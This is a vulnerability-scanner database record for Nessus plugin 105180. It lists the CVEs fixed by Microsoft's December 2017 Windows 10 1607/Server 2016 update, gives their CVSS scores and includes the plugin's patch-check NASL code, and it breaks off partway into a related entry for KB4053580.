KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update

2017-12-12T00:00:00

Description

The remote Windows host is missing security update 4053579. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918) - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)

{"id": "SMB_NT_MS17_DEC_4053579.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update", "description": "The remote Windows host is missing security update 4053579.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "published": "2017-12-12T00:00:00", "modified": "2020-08-18T00:00:00", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 8.5}, "severity": "HIGH", "exploitabilityScore": 6.8, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/105180", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11918", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11914", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11910", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11893", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11901", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11912", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11930", "http://www.nessus.org/u?d6fee547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11888", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11909", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11919", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11903", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11894", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11913", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11887", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11889", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11895", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11886", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11899", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11911", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11905", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11890", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907"], "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "immutableFields": [], "lastseen": "2023-01-11T14:41:55", "viewCount": 193, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:598349"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0750", "CPAI-2017-1028", "CPAI-2017-1029", "CPAI-2017-1031", "CPAI-2017-1032", "CPAI-2017-1033", "CPAI-2017-1034", "CPAI-2017-1035", "CPAI-2017-1036", "CPAI-2017-1040", "CPAI-2017-1043", "CPAI-2017-1047", "CPAI-2017-1049", "CPAI-2017-1081", "CPAI-2018-0007"]}, {"type": "cve", "idList": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"]}, {"type": "kaspersky", "idList": ["KLA10918", "KLA11156", "KLA11158"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11885", "MS:CVE-2017-11886", "MS:CVE-2017-11887", "MS:CVE-2017-11888", "MS:CVE-2017-11889", "MS:CVE-2017-11890", "MS:CVE-2017-11893", "MS:CVE-2017-11894", "MS:CVE-2017-11895", "MS:CVE-2017-11899", "MS:CVE-2017-11901", "MS:CVE-2017-11903", "MS:CVE-2017-11905", "MS:CVE-2017-11906", "MS:CVE-2017-11907", "MS:CVE-2017-11909", "MS:CVE-2017-11910", "MS:CVE-2017-11911", "MS:CVE-2017-11912", "MS:CVE-2017-11913", "MS:CVE-2017-11914", "MS:CVE-2017-11918", "MS:CVE-2017-11919", "MS:CVE-2017-11927", "MS:CVE-2017-11930"]}, {"type": "mskb", "idList": ["KB4052303", "KB4052978", "KB4053473", "KB4053578", "KB4053579", "KB4053580", "KB4053581", "KB4054517", "KB4054518", "KB4054519", "KB4054520", "KB4054521", "KB4054522", "KB4054523", "KB4130957"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_DEC_4053578.NASL", "SMB_NT_MS17_DEC_4053580.NASL", "SMB_NT_MS17_DEC_4053581.NASL", "SMB_NT_MS17_DEC_4054517.NASL", "SMB_NT_MS17_DEC_4054518.NASL", "SMB_NT_MS17_DEC_4054519.NASL", "SMB_NT_MS17_DEC_4054520.NASL", "SMB_NT_MS17_DEC_INTERNET_EXPLORER.NASL", "SMB_NT_MS17_DEC_WIN2008.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812244", "OPENVAS:1361412562310812245", "OPENVAS:1361412562310812331", "OPENVAS:1361412562310812332", "OPENVAS:1361412562310812333", "OPENVAS:1361412562310812334", "OPENVAS:1361412562310812335", "OPENVAS:1361412562310812336", "OPENVAS:1361412562310813336", "OPENVAS:1361412562310813338", "OPENVAS:1361412562310813340", "OPENVAS:1361412562310813341", "OPENVAS:1361412562310813342", "OPENVAS:1361412562310813346"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145479", "PACKETSTORM:145480", "PACKETSTORM:145483", "PACKETSTORM:145484", "PACKETSTORM:145781", "PACKETSTORM:145782", "PACKETSTORM:145783", "PACKETSTORM:145787", "PACKETSTORM:145950", "PACKETSTORM:147593"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:37E3427DF233215A897449A8844AA56D"]}, {"type": "saint", "idList": ["SAINT:05B17BC33184A044F91ECA8B2568248B", "SAINT:C4674FB138FD60F9330A06268CB37D2D", "SAINT:E09A7B11198664E783694CD57E5F0D4C"]}, {"type": "seebug", "idList": ["SSV:97003", "SSV:97004", "SSV:97005", "SSV:97008", "SSV:97094"]}, {"type": "symantec", "idList": ["SMNTC-102045", "SMNTC-102046", "SMNTC-102047", "SMNTC-102050", "SMNTC-102053", "SMNTC-102054", "SMNTC-102055", "SMNTC-102058", "SMNTC-102062", "SMNTC-102063", "SMNTC-102065", "SMNTC-102077", "SMNTC-102078", "SMNTC-102080", "SMNTC-102081", "SMNTC-102082", "SMNTC-102085", "SMNTC-102086", "SMNTC-102087", "SMNTC-102088", "SMNTC-102089", "SMNTC-102091", "SMNTC-102092", "SMNTC-102093", "SMNTC-102095"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C29A5D06DFA4855828033CE3321D48DE"]}, {"type": "threatpost", "idList": ["THREATPOST:889F51C6964835BFE33F9D16F1C53205", "THREATPOST:B332E36B927835B6FDC7AD4DB93CE28C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:83CF76ED2F779A162F6FE7688839D2BF"]}, {"type": "zdi", "idList": ["ZDI-17-1016", "ZDI-17-945", "ZDI-17-946", "ZDI-17-947", "ZDI-17-948", "ZDI-18-123"]}, {"type": "zdt", "idList": ["1337DAY-ID-29261", "1337DAY-ID-29262", "1337DAY-ID-29263", "1337DAY-ID-29264", "1337DAY-ID-29407", "1337DAY-ID-29408", "1337DAY-ID-29409", "1337DAY-ID-29410", "1337DAY-ID-29568", "1337DAY-ID-30343"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:598349"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0007"]}, {"type": "cve", "idList": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"]}, {"type": "kaspersky", "idList": ["KLA10918", "KLA11156", "KLA11158"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-11901/", "MSF:ILITIES/MSFT-CVE-2017-11907/"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11885", "MS:CVE-2017-11886", "MS:CVE-2017-11887", "MS:CVE-2017-11888", "MS:CVE-2017-11889", "MS:CVE-2017-11890", "MS:CVE-2017-11893", "MS:CVE-2017-11894", "MS:CVE-2017-11895", "MS:CVE-2017-11899", "MS:CVE-2017-11901", "MS:CVE-2017-11903", "MS:CVE-2017-11905", "MS:CVE-2017-11906", "MS:CVE-2017-11907", "MS:CVE-2017-11909", "MS:CVE-2017-11910", "MS:CVE-2017-11911", "MS:CVE-2017-11912", "MS:CVE-2017-11913", "MS:CVE-2017-11914", "MS:CVE-2017-11918", "MS:CVE-2017-11919", "MS:CVE-2017-11927", "MS:CVE-2017-11930"]}, {"type": "mskb", "idList": ["KB4052303", "KB4053578", "KB4054517"]}, {"type": "nessus", "idList": ["SMB_HOTFIXES.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812244", "OPENVAS:1361412562310812245", "OPENVAS:1361412562310812331", "OPENVAS:1361412562310812332", "OPENVAS:1361412562310812333", "OPENVAS:1361412562310812334", "OPENVAS:1361412562310812335", "OPENVAS:1361412562310812336"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145479", "PACKETSTORM:145480", "PACKETSTORM:145483", "PACKETSTORM:145484"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:37E3427DF233215A897449A8844AA56D"]}, {"type": "saint", "idList": ["SAINT:05B17BC33184A044F91ECA8B2568248B"]}, {"type": "seebug", "idList": ["SSV:97003", "SSV:97004", "SSV:97005", "SSV:97008"]}, {"type": "symantec", "idList": ["SMNTC-102050", "SMNTC-102092"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C29A5D06DFA4855828033CE3321D48DE"]}, {"type": "threatpost", "idList": ["THREATPOST:889F51C6964835BFE33F9D16F1C53205", "THREATPOST:B332E36B927835B6FDC7AD4DB93CE28C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:83CF76ED2F779A162F6FE7688839D2BF"]}, {"type": "zdi", "idList": ["ZDI-17-945", "ZDI-17-946", "ZDI-17-947", "ZDI-17-948"]}, {"type": "zdt", "idList": ["1337DAY-ID-29261"]}]}, "exploitation": null, "vulnersScore": 0.8}, "_state": {"dependencies": 1673452425, "score": 1673449353}, "_internal": {"score_hash": "c2d051ece9abbdd599bd29a266f82d25"}, "pluginID": "105180", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105180);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053579\");\n script_xref(name:\"MSFT\", value:\"MS17-4053579\");\n\n script_name(english:\"KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053579.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11909,\n CVE-2017-11910, CVE-2017-11911, CVE-2017-11914,\n CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053579/windows-10-update-kb4053579\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6fee547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053579.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053579');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053579])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "solution": "Apply security update KB4053579.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-11885", "vendor_cvss2": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 6.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "High", "score": "8.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-12-12T00:00:00", "vulnerabilityPublicationDate": "2017-12-12T00:00:00", "exploitableWith": []}

{"nessus": [{"lastseen": "2023-01-11T14:42:04", "description": "The remote Windows host is missing security update 4053580.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4053580: Windows 10 Version 1703 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 